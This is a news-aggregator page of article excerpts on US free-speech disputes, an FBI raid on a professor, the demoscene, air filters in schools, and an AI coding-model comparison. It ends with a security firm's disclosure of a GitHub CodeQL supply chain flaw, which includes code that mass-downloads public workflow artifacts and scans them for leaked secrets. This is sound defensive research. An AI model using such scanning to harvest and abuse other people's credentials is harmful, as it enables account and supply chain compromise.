10 interesting stories served every morning and every evening.
“Congress shall make no law respecting an establishment of religion, or prohibiting the free exercise thereof; or abridging the freedom of speech, or of the press; or the right of the people peaceably to assemble, and to petition the Government for a redress of grievances.” -U. S. Constitution, First Amendment.
In an address to Congress this month, President Trump claimed he had “brought free speech back to America.” But barely two months into his second term, the president has waged an unprecedented attack on the First Amendment rights of journalists, students, universities, government workers, lawyers and judges.
This story explores a slew of recent actions by the Trump administration that threaten to undermine all five pillars of the First Amendment to the U. S. Constitution, which guarantees freedoms concerning speech, religion, the media, the right to assembly, and the right to petition the government and seek redress for wrongs.
The right to petition allows citizens to communicate with the government, whether to complain, request action, or share viewpoints — without fear of reprisal. But that right is being assaulted by this administration on multiple levels. For starters, many GOP lawmakers are now heeding their leadership’s advice to stay away from local town hall meetings and avoid the wrath of constituents affected by the administration’s many federal budget and workforce cuts.
Another example: President Trump recently fired most of the people involved in processing Freedom of Information Act (FOIA) requests for government agencies. FOIA is an indispensable tool used by journalists and the public to request government records, and to hold leaders accountable.
The biggest story by far this week was the bombshell from The Atlantic editor Jeffrey Goldberg, who recounted how he was inadvertently added to a Signal group chat with National Security Advisor Michael Waltz and 16 other Trump administration officials discussing plans for an upcoming attack on Yemen.
One overlooked aspect of Goldberg’s incredible account is that by planning and coordinating the attack on Signal — which features messages that can auto-delete after a short time — administration officials were evidently seeking a way to avoid creating a lasting (and potentially FOIA-able) record of their deliberations.
“Intentional or not, use of Signal in this context was an act of erasure—because without Jeffrey Goldberg being accidentally added to the list, the general public would never have any record of these communications or any way to know they even occurred,” Tony Bradley wrote this week at Forbes.
Petitioning the government, particularly when it ignores your requests, often requires challenging federal agencies in court. But that becomes far more difficult if the most competent law firms start to shy away from cases that may involve crossing the president and his administration.
On March 22, the president issued a memorandum that directs heads of the Justice and Homeland Security Departments to “seek sanctions against attorneys and law firms who engage in frivolous, unreasonable and vexatious litigation against the United States,” or in matters that come before federal agencies.
The POTUS recently issued several executive orders railing against specific law firms whose attorneys worked on legal cases against him. On Friday, the president announced that the law firm of Skadden, Arps, Slate, Meagher & Flom had agreed to provide $100 million in pro bono work on issues that he supports.
Trump issued another order naming the firm Paul, Weiss, Rifkind, Wharton & Garrison, which ultimately agreed to pledge $40 million in pro bono legal services to the president’s causes.
Other Trump executive orders targeted law firms Jenner & Block and WilmerHale, both of which have attorneys that worked with special counsel Robert Mueller on the investigation into Russian interference in the 2016 election. But this week, two federal judges in separate rulings froze parts of those orders.
“There is no doubt this retaliatory action chills speech and legal advocacy, and that is qualified as a constitutional harm,” wrote Judge Richard Leon, who ruled against the executive order targeting WilmerHale.
President Trump recently took the extraordinary step of calling for the impeachment of federal judges who rule against the administration. Trump called U. S. District Judge James Boasberg a “Radical Left Lunatic” and urged that he be removed from office for blocking the deportation of Venezuelan alleged gang members under a rarely invoked wartime legal authority.
In a rare public rebuke to a sitting president, U. S. Supreme Court Chief Justice John Roberts issued a statement on March 18 pointing out that “For more than two centuries, it has been established that impeachment is not an appropriate response to disagreement concerning a judicial decision.”
The U. S. Constitution provides that judges can be removed from office only through impeachment by the House of Representatives and conviction by the Senate. The Constitution also states that judges’ salaries cannot be reduced while they are in office.
Undeterred, House Speaker Mike Johnson this week suggested the administration could still use the power of its purse to keep courts in line, and even floated the idea of wholesale eliminating federal courts.
“We do have authority over the federal courts as you know,” Johnson said. “We can eliminate an entire district court. We have power of funding over the courts, and all these other things. But desperate times call for desperate measures, and Congress is going to act, so stay tuned for that.”
President Trump has taken a number of actions to discourage lawful demonstrations at universities and colleges across the country, threatening to cut federal funding for any college that supports protests he deems “illegal.”
A Trump executive order in January outlined a broad federal crackdown on what he called “the explosion of antisemitism” on U. S. college campuses. This administration has asserted that foreign students who are lawfully in the United States on visas do not enjoy the same free speech or due process rights as citizens.
Reuters reports that the acting civil rights director at the Department of Education (DOE) on March 10 sent letters to 60 educational institutions warning they could lose federal funding if they don’t do more to combat antisemitism. On March 20, Trump issued an order calling for the closure of the DOE.
Meanwhile, U. S. Immigration and Customs Enforcement (ICE) agents have been detaining and trying to deport pro-Palestinian students who are legally in the United States. The administration is targeting students and academics who spoke out against Israel’s attacks on Gaza, or who were active in campus protests against U.S. support for the attacks. Secretary of State Marco Rubio told reporters Thursday that at least 300 foreign students have seen their visas revoked under President Trump, a far higher number than was previously known.
In his first term, Trump threatened to use the National Guard or the U. S. military to deal with protesters, and in campaigning for re-election he promised to revisit the idea.
“I think the bigger problem is the enemy from within,” Trump told Fox News in October 2024. “We have some very bad people. We have some sick people, radical left lunatics. And I think they’re the big — and it should be very easily handled by, if necessary, by National Guard, or if really necessary, by the military, because they can’t let that happen.”
This term, Trump acted swiftly to remove the top judicial advocates in the armed forces who would almost certainly push back on any request by the president to use U. S. soldiers in an effort to quell public protests, or to arrest and detain immigrants. In late February, the president and Defense Secretary Pete Hegseth fired the top legal officers for the military services — those responsible for ensuring the Uniform Code of Military Justice is followed by commanders.
Military.com warns that the purge “sets an alarming precedent for a crucial job in the military, as President Donald Trump has mused about using the military in unorthodox and potentially illegal ways.” Hegseth told reporters the removals were necessary because he didn’t want them to pose any “roadblocks to orders that are given by a commander in chief.”
President Trump has sued a number of U. S. news outlets, including 60 Minutes, CNN, The Washington Post, The New York Times and other smaller media organizations for unflattering coverage.
In a $10 billion lawsuit against 60 Minutes and its parent Paramount, Trump claims they selectively edited an interview with former Vice President Kamala Harris prior to the 2024 election. The TV news show last month published transcripts of the interview at the heart of the dispute, but Paramount is reportedly considering a settlement to avoid potentially damaging its chances of winning the administration’s approval for a pending multibillion-dollar merger.
The president sued The Des Moines Register and its parent company, Gannett, for publishing a poll showing Trump trailing Harris in the 2024 presidential election in Iowa (a state that went for Trump). The POTUS also is suing the Pulitzer Prize board over 2018 awards given to The New York Times and The Washington Post for their coverage of purported Russian interference in the 2016 election.
Whether or not any of the president’s lawsuits against news organizations have merit or succeed is almost beside the point. The strategy behind suing the media is to make reporters and newsrooms think twice about criticizing or challenging the president and his administration. The president also knows some media outlets will find it more expedient to settle.
Trump also sued ABC News and George Stephanopoulos for stating that the president had been found liable for “rape” in a civil case [Trump was found liable for sexually abusing and defaming E. Jean Carroll]. ABC parent Disney settled that claim by agreeing to donate $15 million to the Trump Presidential Library.
Following the attack on the U. S. Capitol on Jan. 6, 2021, Facebook blocked President Trump’s account. Trump sued Meta, and after the president’s victory in 2024 Meta settled and agreed to pay Trump $25 million: $22 million would go to his presidential library, and the rest to legal fees. Meta CEO Mark Zuckerberg also announced Facebook and Instagram would get rid of fact-checkers and rely instead on reader-submitted “community notes” to debunk disinformation on the social media platform.
Brendan Carr, the president’s pick to run the Federal Communications Commission (FCC), has pledged to “dismantle the censorship cartel and restore free speech rights for everyday Americans.” But on January 22, 2025, the FCC reopened complaints against ABC, CBS and NBC over their coverage of the 2024 election. The previous FCC chair had dismissed the complaints as attacks on the First Amendment and an attempt to weaponize the agency for political purposes.
According to Reuters, the complaints call for an investigation into how ABC News moderated the pre-election TV debate between Trump and Harris, and into appearances of then-Vice President Harris on 60 Minutes and on NBC’s “Saturday Night Live.”
Since then, the FCC has opened investigations into NPR and PBS, alleging that they are breaking sponsorship rules. The Center for Democracy & Technology (CDT), a think tank based in Washington, D. C., noted that the FCC is also investigating KCBS in San Francisco for reporting on the location of federal immigration authorities.
“Even if these investigations are ultimately closed without action, the mere fact of opening them — and the implicit threat to the news stations’ license to operate — can have the effect of deterring the press from news coverage that the Administration dislikes,” the CDT’s Kate Ruane observed.
Trump has repeatedly threatened to “open up” libel laws, with the goal of making it easier to sue media organizations for unfavorable coverage. But this week, the U. S. Supreme Court declined to hear a challenge brought by Trump donor and Las Vegas casino magnate Steve Wynn to overturn the landmark 1964 decision in New York Times v. Sullivan, which insulates the press from libel suits over good-faith criticism of public figures.
The president also has insisted on picking which reporters and news outlets should be allowed to cover White House events and participate in the press pool that trails the president. He barred the Associated Press from the White House and Air Force One over their refusal to call the Gulf of Mexico by another name.
And the Defense Department has ordered a number of top media outlets to vacate their spots at the Pentagon, including CNN, The Hill, The Washington Post, The New York Times, NBC News, Politico and National Public Radio.
“Incoming media outlets include the New York Post, Breitbart, the Washington Examiner, the Free Press, the Daily Caller, Newsmax, the Huffington Post and One America News Network, most of whom are seen as conservative or favoring Republican President Donald Trump,” Reuters reported.
Shortly after Trump took office again in January 2025, the administration began circulating lists of hundreds of words that government staff and agencies shall not use in their reports and communications.
The Brookings Institution notes that in moving to comply with this anti-speech directive, federal agencies have purged countless taxpayer-funded data sets from a swathe of government websites, including data on crime, sexual orientation, gender, education, climate, and global development.
The New York Times reports that in the past two months, hundreds of terabytes of digital resources for analyzing data have been taken off government websites.
“While in many cases the underlying data still exists, the tools that make it possible for the public and researchers to use that data have been removed,” The Times wrote.
On Jan. 27, Trump issued a memo (PDF) that paused all federally funded programs pending a review of those programs for alignment with the administration’s priorities. Among those was ensuring that no funding goes toward advancing “Marxist equity, transgenderism, and green new deal social engineering policies.”
According to the CDT, this order is a blatant attempt to force government grantees to cease engaging in speech that the current administration dislikes, including speech about the benefits of diversity, climate change, and LGBTQ issues.
“The First Amendment does not permit the government to discriminate against grantees because it does not like some of the viewpoints they espouse,” the CDT’s Ruane wrote. “Indeed, those groups that are challenging the constitutionality of the order argued as much in their complaint, and have won an injunction blocking its implementation.”
On January 20, the same day Trump issued an executive order on free speech, the president also issued an executive order titled “Reevaluating and Realigning United States Foreign Aid,” which froze funding for programs run by the U. S. Agency for International Development (USAID). Among those were programs designed to empower civil society and human rights groups, journalists and others responding to digital repression and Internet shutdowns.
According to the Electronic Frontier Foundation (EFF), this includes many freedom technologies that use cryptography, fight censorship, protect freedom of speech, privacy and anonymity for millions of people around the world.
“While the State Department has issued some limited waivers, so far those waivers do not seem to cover the open source internet freedom technologies,” the EFF wrote about the USAID disruptions. “As a result, many of these projects have to stop or severely curtail their work, lay off talented workers, and stop or slow further development.”
On March 14, the president signed another executive order that effectively gutted the U. S. Agency for Global Media (USAGM), which oversees or funds media outlets including Radio Free Europe/Radio Liberty and Voice of America (VOA). The USAGM also oversees Radio Free Asia, which supporters say has been one of the most reliable tools used by the government to combat Chinese propaganda.
But this week, U. S. District Court Judge Royce Lamberth, a Reagan appointee, temporarily blocked USAGM’s closure by the administration.
“RFE/RL has, for decades, operated as one of the organizations that Congress has statutorily designated to carry out this policy,” Lamberth wrote in a 10-page opinion. “The leadership of USAGM cannot, with one sentence of reasoning offering virtually no explanation, force RFE/RL to shut down — even if the President has told them to do so.”
The Trump administration rescinded a decades-old policy that instructed officers not to take immigration enforcement actions in or near “sensitive” or “protected” places, such as churches, schools, and hospitals.
That directive was immediately challenged in a case brought by a group of Quakers, Baptists and Sikhs, who argued the policy reversal was keeping people from attending services for fear of being arrested on civil immigration violations. On Feb. 24, a federal judge agreed and blocked ICE agents from entering churches or targeting migrants nearby.
The president’s executive order allegedly addressing antisemitism came with a fact sheet that described college campuses as “infested” with “terrorists” and “jihadists.” Multiple faith groups expressed alarm over the order, saying it attempts to weaponize antisemitism and promote “dehumanizing anti-immigrant policies.”
The president also announced the creation of a “Task Force to Eradicate Anti-Christian Bias,” to be led by Attorney General Pam Bondi. Never mind that Christianity is easily the largest faith in America and that Christians are well-represented in Congress.
The Rev. Paul Brandeis Raushenbush, a Baptist minister and head of the progressive Interfaith Alliance, issued a statement accusing Trump of hypocrisy in claiming to champion religion by creating the task force.
“From allowing immigration raids in churches, to targeting faith-based charities, to suppressing religious diversity, the Trump Administration’s aggressive government overreach is infringing on religious freedom in a way we haven’t seen for generations,” Raushenbush said.
A statement from Americans United for Separation of Church and State said the task force could lead to religious persecution of those with other faiths.
“Rather than protecting religious beliefs, this task force will misuse religious freedom to justify bigotry, discrimination, and the subversion of our civil rights laws,” said Rachel Laser, the group’s president and CEO.
Where is President Trump going with all these blatant attacks on the First Amendment? The president has made no secret of his affection for autocratic leaders and “strongmen” around the world, and he is particularly enamored with Hungary’s far-right Prime Minister Viktor Orbán, who has visited Trump’s Mar-a-Lago resort twice in the past year.
A March 15 essay in The Atlantic by Hungarian investigative journalist András Pethő recounts how Orbán rose to power by consolidating control over the courts, and by building his own media universe while simultaneously placing a stranglehold on the independent press.
“As I watch from afar what’s happening to the free press in the United States during the first weeks of Trump’s second presidency — the verbal bullying, the legal harassment, the buckling by media owners in the face of threats — it all looks very familiar,” Pethő wrote. “The MAGA authorities have learned Orbán’s lessons well.”
...
Read the original on krebsonsecurity.com »
A prominent computer scientist who has spent 20 years publishing academic papers on cryptography, privacy, and cybersecurity has gone incommunicado, had his professor profile, email account, and phone number removed by his employer, Indiana University, and had his homes raided by the FBI. No one knows why.
Xiaofeng Wang has a long list of prestigious titles. He was the associate dean for research at Indiana University’s Luddy School of Informatics, Computing and Engineering, a fellow at the Institute of Electrical and Electronics Engineers and the American Association for the Advancement of Science, and a tenured professor at Indiana University at Bloomington. According to his employer, he has served as principal investigator on research projects totaling nearly $23 million over his 21 years there.
He has also co-authored scores of academic papers on a diverse range of research fields, including cryptography, systems security, and data privacy, including the protection of human genomic data. I have personally spoken to him on three occasions for articles here, here, and here.
In recent weeks, Wang’s email account, phone number, and profile page at the Luddy School were quietly erased by his employer. Over the same time, Indiana University also removed a profile for his wife, Nianli Ma, who was listed as a Lead Systems Analyst and Programmer at the university’s Library Technologies division.
As reported by the Bloomingtonian and later the Herald-Times in Bloomington, a small fleet of unmarked cars driven by government agents descended on the Bloomington home of Wang and Ma on Friday. They spent most of the day going in and out of the house and occasionally transferred boxes from their vehicles. TV station WTHR, meanwhile, reported that a second home owned by Wang and Ma and located in Carmel, Indiana, was also searched. The station said that both a resident and an attorney for the resident were on scene during at least part of the search.
...
Read the original on arstechnica.com »
The demoscene has become national UNESCO heritage in Sweden, thanks to an application that Ziphoid and I submitted last year. This has already happened in several European countries, as part of the international Art of Coding initiative to make the demoscene a global UNESCO heritage. I think this makes plenty of sense, since the demoscene is arguably the oldest creative digital subculture around. It has largely stuck to its own values and traditions throughout the world’s technological and economic shifts, and that sort of consistency is quite unusual in the digital world.
The main idea of the demoscene is to compete with productions that squeeze the most out of a particular piece of hardware, but that’s not what all demosceners like to do. My demogroup Hack n’ Trade, for example, cares more about making weird stuff, and there are plenty of other groups like that. Some demosceners don’t release anything at all, but might do important work to keep the scene alive (BBS-trading, organizing parties, preserving software…).
I’ve written plenty of papers and blog posts about the demoscene, and I’ve often felt a gap between the stuff I write as a researcher and my personal experience of the demoscene. There is certainly an international demoscene with big events and huge releases that can be described in general terms, but what has mattered more to me is the local scenes, the small parties and the people you hang out with. Meeting up with a bunch of friends and making weird computer stuff “for no reason, really” is a great setting. That’s what I enjoy the most, in the end. For other sceners, it’s different.
There is a sort of diversity in the scene that is difficult to capture and generalize. The Swedish coder with a well-paid programming job and a busy family life might consider the demoscene an escape to his teenage years, while the LSD-munching raver from France who trades illegal warez on BBSs and makes weird pixel art considers the scene a free culture without corporate or art world bullshit. There’s room for both in the scene, because it is weirdly conservative and open at the same time. And perhaps that is one of the reasons why it should be considered an intangible heritage.
...
Read the original on www.goto80.com »
Use this service to claim financial reimbursement for a tooth which has been lost and cannot be collected by the Tooth Fairy - for example, teeth which have been:
You can also print and fill in Form TF-230 and leave it under your pillow.
...
Read the original on tf230.matteason.co.uk »
Google just launched Gemini 2.5 Pro on March 26th, claiming it’s the best at coding, reasoning, and pretty much everything else. But I mostly care about how the model compares against the best available coding model, Claude 3.7 Sonnet (thinking), released at the end of February, which I have been using, and it has been a great experience.
Let’s compare these two coding models and see whether I need to change my favourite coding model or whether Claude 3.7 still holds up.
If you want to jump straight to the conclusion, I’d say go for Gemini 2.5 Pro: it’s better at coding, has a one-million-token context window compared to Claude’s 200k, and you can use it for free (a big plus). Claude 3.7 Sonnet is not far behind, but at this point there’s little reason to pick it over Gemini 2.5 Pro.
Just an article ago, Claude 3.7 Sonnet was the default answer to every model comparison, and this remained the same for quite some time. But here you go, Gemini 2.5 Pro takes the lead.
Gemini 2.5 Pro, an experimental thinking model, became the talk of the town within a week of its release. Everyone’s talking about this model on Twitter (X) and YouTube. It’s trending everywhere, like seriously. It’s the first model from Google to receive such fanfare.
And it is #1 on LMArena, just like that. But what does this mean? It means this model is beating all the other models in coding, math, science, image understanding, and other areas.
Gemini 2.5 Pro comes with a 1 million token context window, with a 2 million token context window coming soon. 🤯
You can check out other folks like Theo-t3 talking about this model to get a bit more insight into it:
It is the best coding model to date, with an accuracy of about 63.8% on SWE-bench. This is definitely higher than our previous top coding model, Claude 3.7 Sonnet, which scored about 62.3%.
This is a quick demo Google shared on this model of building a dinosaur game.
Here’s a quick benchmark of this model on Reasoning, Mathematics, and Science. This confirms that the model is not just suitable for coding but also for all your other needs. They claim it’s an all-rounder. 🤷♂️
This is all cool, and I’ll confirm the claim, but in this article, I will mainly be comparing the model on coding, and let’s see how well it performs compared to Claude 3.7 Sonnet.
Let’s compare these two models in coding. We’ll do a total of 4 tests, mainly on WebDev, animation and a tricky LeetCode question.
Prompt: Create a simple flight simulator using JavaScript. The simulator should feature a basic plane that can take off from a flat runway. The plane’s movement should be controlled with simple keyboard inputs (e.g., arrow keys or WASD). Additionally, it generates a basic cityscape using blocky structures, similar to Minecraft.
You can find the code it generated here: Link
Here’s the output of the program:
I definitely got exactly what I asked for, with everything functioning, from plane movements to the basic Minecraft-styled block buildings. I can’t really complain about anything here. 10/10 for this one.
You can find the code it generated here: Link
Here’s the output of the program:
I can see some issues with this one. The plane clearly faces sideways, and I don’t know why. It also went out of control once it took off and flew well outside the city. Basically, I’d say we didn’t really get a fully working flight simulator here.
It’s fair to say that Gemini 2.5 Pro got this correct in one shot. The issues with the Claude 3.7 Sonnet code aren’t that hard to resolve, but we didn’t get the output we expected, and it’s definitely not close to what Gemini 2.5 Pro gave us.
This is one of the toughest questions for LLMs. I’ve tried it with many other LLMs, but none could get it right. Let’s see how these two models handle it.
Prompt: Build a simple 3D Rubik’s Cube visualizer and solver in JavaScript using Three.js. The cube should be a 3×3 Rubik’s Cube with standard colours. Have a scramble button that randomly scrambles the cube. Include a solve function that animates the solution step by step. Allow basic mouse controls to rotate the view.
You can find the code it generated here: Link
Here’s the output of the program:
It’s impressive that it could do something this hard in one shot. With the 1 million token context window, I can truly see how powerful this model seems to be.
You can find the code it generated here: Link
Here’s the output of the program:
Again, I was kind of disappointed that it had the same issue as some other LLMs: failing with the colours and completely failing to solve the cube. I did try to help it come up with the answer, but it didn’t really help.
Here again, Gemini 2.5 Pro takes the lead. And the best part is that all of it was done in one shot. Claude 3.7 was really disappointing, as it could not get this one correct, despite being one of the finest coding models out there.
Prompt: Create a simple JavaScript script that visualizes a ball bouncing inside a rotating 4D tesseract. When the ball collides with a side, highlight that side to indicate the impact.
You can find the code it generated here: Link
Here’s the output of the program:
I cannot notice a single issue in the output. The ball and the collision physics all work perfectly, even the part where I asked it to highlight the collision side works. This free model seems to be insane for coding. 🔥
You can find the code it generated here: Link
Here’s the output of the program:
Wow, finally, Claude 3.7 Sonnet got an answer correct. It also added colors to each side, but who asked for it? 🤷♂️ Nevertheless, I can’t really complain much here, as the main functionality seems to work just fine.
The answer is evident this time: both models got it correct, implementing everything I asked for. I won’t say I like Claude 3.7 Sonnet’s output more, but it definitely put in quite some extra work compared to Gemini 2.5 Pro.
For this one, let’s do a quick LeetCode check to see how these models handle a tricky LeetCode question with an acceptance rate of just 14.9%: Maximum Value Sum by Placing 3 Rooks.
Claude 3.7 Sonnet is known to be super good at solving LC questions. If you want to see how Claude 3.7 compares to some top models like Grok 3 and o3-mini-high, check out this blog post:
Given how easily it answered all three of the coding questions we tested, I have quite high hopes for this model.
You can find the code it generated here: Link
It did take quite some time to answer this one, though, and the code it wrote is quite hard to make sense of. I think its solution is more complicated than necessary. But still, the main thing we’re looking for is whether it can answer correctly.
As expected, it answered this tough LeetCode question in one shot too. This is one of the questions I got stuck on when learning DSA. I’m not sure how I feel about that.
I hope this model will crush this one, as in all the other coding tests I’ve done, Claude 3.7 Sonnet has answered all of the LeetCode questions correctly.
You can find the code it generated here: Link
It did write correct code but got TLE (Time Limit Exceeded). If I have to compare the code’s simplicity, though, I’d say this model made the code simpler and easier to understand.
Gemini 2.5 got the answer correct and also wrote the code in the expected time complexity, but Claude 3.7 Sonnet fell into TLE. If I have to compare the code simplicity, Claude 3.7’s generated code seems to be better.
For me, Gemini 2.5 Pro is the winner. We’ve compared two models that are said to be the best at coding. The big difference I see in the model stats is that Gemini 2.5 Pro has a much larger context window, but let’s not forget that this is an experimental model, and improvements are still on the way.
Google’s been killing it recently with such solid models, previously with the Gemma 3 27B model, a super lightweight model with unbelievable results, and now with this beast of a model, Gemini 2.5 Pro.
By the way, if you are here, Composio is building the skill repository for agents. You can connect LLMs to any application from Gmail to Asana and get things done quickly. You can use MCP servers, or directly add the tools to LLMs in the traditional agentic way.
...
Read the original on composio.dev »
An emergency situation that turned out to be mostly a false alarm led a lot of schools in Los Angeles to install air filters, and something strange happened: Test scores went up. By a lot. And the gains were sustained in the subsequent year rather than fading away.
The impact of the air filters is strikingly large given what a simple change we’re talking about. The school district didn’t reengineer the school buildings or make dramatic education reforms; they just installed $700 commercially available filters that you could plug into any room in the country. But it’s consistent with a growing literature on the cognitive impact of air pollution, which finds that everyone from chess players to baseball umpires to workers in a pear-packing factory suffer deteriorations in performance when the air is more polluted.
And while it’s too hasty to draw sweeping conclusions on the basis of one study, it would be incredibly cheap to have a few cities experiment with installing air filters in some of their schools to get more data and draw clearer conclusions about exactly how much of a difference this makes.
Strikingly, however, air testing conducted around the time of the installation of the filters shows that the schools didn’t actually have abnormally high levels of the kinds of pollution that are normally associated with natural gas. Methane is lighter than air, and by the time the filters were installed — nearly three months after the leak — the extra pollution caused was all the way up in the sky and not affecting school buildings.
Consequently, the installation of the filters served not to remove extra contamination caused by the leak, but simply to clean up the normal amount of background indoor air pollution present in the Valley. That lets Gilraine estimate the difference in student performance for schools just inside the boundary compared to those just outside.
For context, this is comparable in scale to some of the most optimistic studies on the potential benefits of smaller class sizes, with Alan Krueger finding that cutting class size by a third leads to a 0.22 standard deviation improvement in academic performance. Other studies find smaller or even negative effects (because adding teachers means bringing in less experienced or less effective ones), but even accepting the positive findings, it costs much more than $700 per classroom to achieve class size reductions of that scale.
But Sefi Roth of the London School of Economics studied university students’ test performance relative to air pollution levels on the day of the test alone. He found that taking a test in a filtered rather than unfiltered room would raise test scores by 0.09 standard deviations. That’s about half the impact Gilraine found, just based on day-of-test air quality. In Gilraine’s natural experiment, students benefited from cleaner air for about four months. Given that context, it’s not incredibly surprising that you could see an impact that’s about twice as large.
What’s natural to ask — though unknowable from the study before us — is how much more change we could see if students benefited from an entire school year of clean air. Or perhaps an entire school career, from pre-K through high school graduation, of clean air.
One striking thing about this is the government has long been aware that indoor air pollution is a potential problem. But according to currently prevailing Indoor Air Quality standards, there was nothing wrong with the air in the schools. Filters were installed because of an essentially unwarranted panic about natural gas.
And while Los Angeles is a fairly high-pollution part of the country, outdoor particulate levels are higher in many areas — including New York, Chicago, and Houston — than they were in the impacted neighborhood. In other words, there’s no reason to think the impacted schools were unusually deficient in their air quality. They just happen to be the ones that installed filters.
For a sense of scale, Mathematica Policy Research’s best evidence on the effectiveness of the highly touted KIPP charter school network finds that after three years at KIPP there is significant improvement on three out of four test metrics — up 0.25 standard deviations on one English test, 0.22 standard deviations on another, and 0.28 standard deviations on one of two math tests.
This is bigger than the impact of letting kids benefit from clean air for four months. But installing the full suite of air filters costs about $1,000 per classroom, and continuing to operate them beyond the first year is cheaper than that. And best of all, unlike totally reworking school operations, it could be scaled up very quickly.
It would be almost trivially easy to get a variety of school districts all around the country to randomly select schools for the installation of air filters. That would rapidly generate a ton of additional data, and if the results continued to be promising, the initiative could be made universal very quickly.
The benefits, on their face, would be extremely large at a relatively low cost. And since air pollution is generally worse in lower-income communities, you would not only raise test scores nationally, but make progress on the big socioeconomic gaps in student achievement that have proven very difficult to remedy.
...
Read the original on www.vox.com »
A potential supply chain attack on GitHub CodeQL started simply: a publicly exposed secret, valid for 1.022 seconds at a time.
In that second, an attacker could take a series of steps that would allow them to execute code within a GitHub Actions workflow in most repositories using CodeQL, GitHub’s code analysis engine trusted by hundreds of thousands of repositories. The impact would reach both public GitHub (GitHub Cloud) and GitHub Enterprise.
If backdooring GitHub Actions sounds familiar, that’s because it’s exactly what threat actors did in the recent tj-actions/changed-files supply chain attack. Imagine that very same supply chain attack, but instead of backdooring actions in tj-actions, they backdoored actions in GitHub CodeQL.
An attacker could use this to:
Compromise intellectual property by exfiltrating the source code of private repositories using CodeQL.
Steal credentials within GitHub Actions secrets of workflow jobs using CodeQL and leverage those secrets to execute further supply chain attacks.
Compromise GitHub Actions secrets of workflows using the GitHub Actions Cache within a repo that uses CodeQL.
This is the story of how we uncovered an exposed secret leading to a race condition, a potential supply chain attack, and CVE-2025-24362.
Note: Per GitHub’s advisory, they have found no evidence of compromise to its platform or systems.
In January 2025, I took a break from Praetorian’s Red Team and began three months of research. I aimed to push the limits of public GitHub Actions exploitation, building on presentations we’ve given at Black Hat, DEF CON, ShmooCon, and Black Hat Arsenal. Tools and takeaways from this research will be implemented in our CI/CD Professional Services Engagements, and into Chariot, our Continuous Threat Exposure Management platform.
I began my research rotation by scanning GitHub Actions workflow artifacts for secrets.
In August 2024, Palo Alto researcher Yaron Avital published an article about identifying secrets in workflow artifacts. I had a hunch that there were still secrets to be found, especially since there hadn’t been much public follow-up work since the article.
I built a simple Actions Artifacts Secret Scanner to get started. It downloads artifacts from GitHub Actions workflows, recursively extracts their contents, and scans their contents for secrets with Nosey Parker, Praetorian’s open-sourced secrets scanning tool.
The Actions Artifacts Secret Scanner has been integrated into Chariot and open-sourced as a Gato capability.
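In outline, such a scanner can be quite small. The sketch below is illustrative rather than Praetorian’s actual tool: the endpoints are GitHub’s documented artifacts API, and the Nosey Parker invocation follows its README, but the datastore path and token placeholder are assumptions.

```python
import io
import subprocess
import zipfile
from pathlib import Path

import requests

API = "https://api.github.com"
# Artifact zip downloads require an authenticated user, even on public repos.
HEADERS = {
    "Accept": "application/vnd.github+json",
    "Authorization": "Bearer <your-github-pat>",  # placeholder
}

def extract_recursively(data: bytes, dest: Path) -> None:
    """Unzip `data` into `dest`, then unzip any nested .zip files inside it."""
    dest.mkdir(parents=True, exist_ok=True)
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        zf.extractall(dest)
    for nested in list(dest.rglob("*.zip")):
        extract_recursively(nested.read_bytes(), nested.with_suffix(""))

def scan_repo_artifacts(owner: str, repo: str, workdir: str = "artifacts") -> None:
    """Download a repository's workflow artifacts and scan them with Nosey Parker."""
    out = Path(workdir)
    resp = requests.get(f"{API}/repos/{owner}/{repo}/actions/artifacts", headers=HEADERS)
    resp.raise_for_status()
    for art in resp.json().get("artifacts", []):
        if art.get("expired"):
            continue
        dl = requests.get(f"{API}/repos/{owner}/{repo}/actions/artifacts/{art['id']}/zip",
                          headers=HEADERS)
        if dl.ok:
            extract_recursively(dl.content, out / str(art["id"]))
    # Scan everything we extracted; `noseyparker report` then prints the findings.
    subprocess.run(["noseyparker", "scan", "--datastore", "np.db", str(out)], check=True)
    subprocess.run(["noseyparker", "report", "--datastore", "np.db"], check=True)

if __name__ == "__main__":
    scan_repo_artifacts("github", "codeql-action")
```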
After running this scanner for one day, it found a secret that could lead to a supply chain attack on GitHub CodeQL.
But first, I needed to see if the key was usable.
CI/CD vulnerabilities sound complicated until you understand the terminology. Let’s catch you up.
GitHub Actions is a continuous integration and continuous delivery (CI/CD) platform that allows the execution of code specified within workflows as part of the CI/CD process. When you push code to a GitHub repository or create a pull request, GitHub Actions can automatically build, test, and deploy your code using workflows defined in YAML files.
For example, let’s say you are building a web application that is hosted in AWS. You can configure a GitHub Actions workflow so that whenever you push code to your repository, it is automatically tested and then deployed to AWS.
If you are new to GitHub Actions, we’d recommend reading through some examples.
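A minimal workflow along those lines might look like the following sketch, where the deploy script and secret names are hypothetical but the YAML structure is standard GitHub Actions syntax:

```yaml
# .github/workflows/deploy.yml -- hypothetical example
name: test-and-deploy

on:
  push:
    branches: [main]   # run on every push to main

permissions:
  contents: read       # scopes this workflow's GITHUB_TOKEN (see below)

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4          # check out the repository
      - run: npm ci && npm test            # build and test the application
      - run: ./scripts/deploy-to-aws.sh    # hypothetical deploy script
        env:
          AWS_ACCESS_KEY_ID: ${{ secrets.AWS_ACCESS_KEY_ID }}
          AWS_SECRET_ACCESS_KEY: ${{ secrets.AWS_SECRET_ACCESS_KEY }}
```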
Every workflow run generates a GITHUB_TOKEN — a special, automatically generated GitHub App installation token that allows the workflow to interact with the repository. This token’s permissions can be configured in the workflow file, at the repository level, or at the org level, determining what actions it can perform within the repository.
* GitHub runners need a way to authenticate to GitHub to do stuff the workflows tell them to do.
* For that purpose, they use the GITHUB_TOKEN.
If the token has high privileges, then token compromise == bad.
We found the publicly exposed secret in a GitHub Actions workflow artifact.
GitHub Actions workflows can upload workflow “artifacts” to GitHub Actions. Workflow artifacts can be any file and are saved by that workflow for later use. By default, artifacts are publicly accessible to anyone with read access to the repository and are stored for up to 90 days.
CodeQL is GitHub’s code analysis engine. The CodeQL actions perform static code analysis on GitHub repositories to try to identify vulnerabilities. CodeQL has found several hundred CVEs over its lifetime, protecting organizations from breaches.
Security tools, like CodeQL, often need access to sensitive systems and data, making them an attractive target to an attacker.
If CodeQL was compromised, one of the most widely used security tools now becomes a backdoor.
